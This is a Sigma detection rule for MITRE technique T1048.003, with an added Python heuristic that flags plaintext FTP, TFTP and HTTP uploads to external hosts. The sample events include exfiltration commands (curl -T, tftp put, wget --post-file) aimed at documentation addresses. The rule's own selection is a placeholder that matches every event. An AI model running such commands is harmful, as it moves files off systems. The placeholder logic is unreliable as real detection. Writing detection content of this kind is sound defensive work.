title: Exfiltration Over Unencrypted Non-C2 Protocol (T1048.003)
id: df00tech-t1048-003
status: experimental
description: "Adversaries may steal data by exfiltrating it over an unencrypted network protocol other than that of the existing command and control channel. Common protocols used include HTTP, FTP, SMTP, DNS, and TFTP. Data may be obfuscated using encoding schemes such as Base64 or embedded within protocol headers and fields without the use of encryption. Real-world threat actors including Lazarus Group, FIN8, APT32, Salt Typhoon, and Mustang Panda have leveraged FTP, HTTP POST, DNS tunneling, and SMTP for this purpose."
references:
  - https://attack.mitre.org/techniques/T1048/003/
  - https://df00tech.com/detections/T1048.003
author: df00tech
date: 2026/04/16
tags:
  - attack.t1048.003
# NOTE: logsource is auto-derived and may need adjustment for your environment
logsource:
  category: process_creation
  product: windows
detection:
  # This detection logic could not be auto-translated; see the KQL/SPL query on df00tech.
  # The selection below is a placeholder that matches every process_creation event
  # (EventID wildcard), so at level high it will fire on everything. Replace it with
  # the df00tech query before enabling this rule.
  selection:
    EventID: '*'
  condition: selection
falsepositives:
  - Legitimate FTP file transfers by IT operations teams using WinSCP or FileZilla to upload builds to internal FTP servers
  - Web developers or DevOps engineers using curl or wget to upload files to HTTP-based staging servers or artifact repositories
  - Monitoring agents or backup tools making HTTP connections on non-standard ports to internal infrastructure that happens to use plaintext
  - Network scanning or vulnerability assessment tools that probe FTP/HTTP ports on public IPs as part of authorized engagements
  - Internal mail relay servers or legacy applications using SMTP on port 25 for legitimate notification emails
level: high
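# Added example, not part of the df00tech rule or its KQL/SPL query: a constructed
# Python heuristic that applies the technique's "plaintext protocol + upload to an
# external host" logic to Windows process_creation events and suppresses the
# internal-destination cases listed under falsepositives. The tool flags, internal
# ranges, sample events and addresses are assumptions (RFC 5737 documentation addresses).

```python
import ipaddress
import re
from urllib.parse import urlparse

# Constructed heuristic standing in for the untranslated df00tech query: flag command
# lines that push a file over a plaintext protocol named by T1048.003 to an external host.
URL_RE = re.compile(r"\b(?:https?|ftp|tftp|smtp)://[^\s\"']+", re.I)
UPLOAD_FLAG_RE = re.compile(
    r"(?:^|\s)(?:-T|--upload-file|-F|--data(?:-binary|-raw)?|--post-(?:file|data)|--mail-from)\b", re.I)
TFTP_PUT_RE = re.compile(r"\btftp(?:\.exe)?\s+(?:-i\s+)?(\S+)\s+put\s", re.I)
PLAINTEXT = {"http", "ftp", "tftp", "smtp"}
# Assumed internal ranges; tune per environment (all listed false positives are internal uploads).
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]

def is_internal(host: str) -> bool:
    """True for RFC 1918/loopback addresses and for bare or .internal hostnames."""
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return "." not in host or host.endswith(".internal")
    return any(addr in net for net in INTERNAL_NETS)

def evaluate(event: dict):
    """Return (image, scheme, host) for a plaintext upload to an external host, else None."""
    cmd = event.get("CommandLine", "")
    image = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    m = TFTP_PUT_RE.search(cmd)  # tftp.exe has no URL form: "tftp -i <host> put <file>"
    if m and not is_internal(m.group(1)):
        return (image, "tftp", m.group(1))
    for url in URL_RE.findall(cmd):
        parsed = urlparse(url)
        host = parsed.hostname or ""
        if parsed.scheme.lower() in PLAINTEXT and not is_internal(host) and UPLOAD_FLAG_RE.search(cmd):
            return (image, parsed.scheme.lower(), host)
    return None  # https, internal destinations and non-upload invocations are not reported

def scan(events):
    """Evaluate every event and return the list of findings."""
    return [f for f in map(evaluate, events) if f]

# Constructed sample process_creation events (documentation addresses, not real indicators).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\curl.exe", "CommandLine": r"curl.exe -T C:\Users\bob\docs.zip ftp://203.0.113.10/up/"},
    {"Image": r"C:\Tools\curl.exe", "CommandLine": r"curl.exe -T build.zip ftp://10.0.0.5/builds/"},  # internal: FP case
    {"Image": r"C:\Tools\curl.exe", "CommandLine": r"curl.exe -T dump.zip https://203.0.113.10/"},  # encrypted: not .003
    {"Image": r"C:\Windows\System32\tftp.exe", "CommandLine": r"tftp.exe -i 198.51.100.7 put C:\temp\cfg.bin"},
    {"Image": r"C:\Tools\wget.exe", "CommandLine": r"wget.exe --post-file=C:\temp\export.csv http://198.51.100.7/collect"},
]
```

Running scan(SAMPLE_EVENTS) reports the curl-to-FTP, tftp put and wget POST events and leaves the internal and HTTPS uploads alone, which is the triage split the falsepositives list describes.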
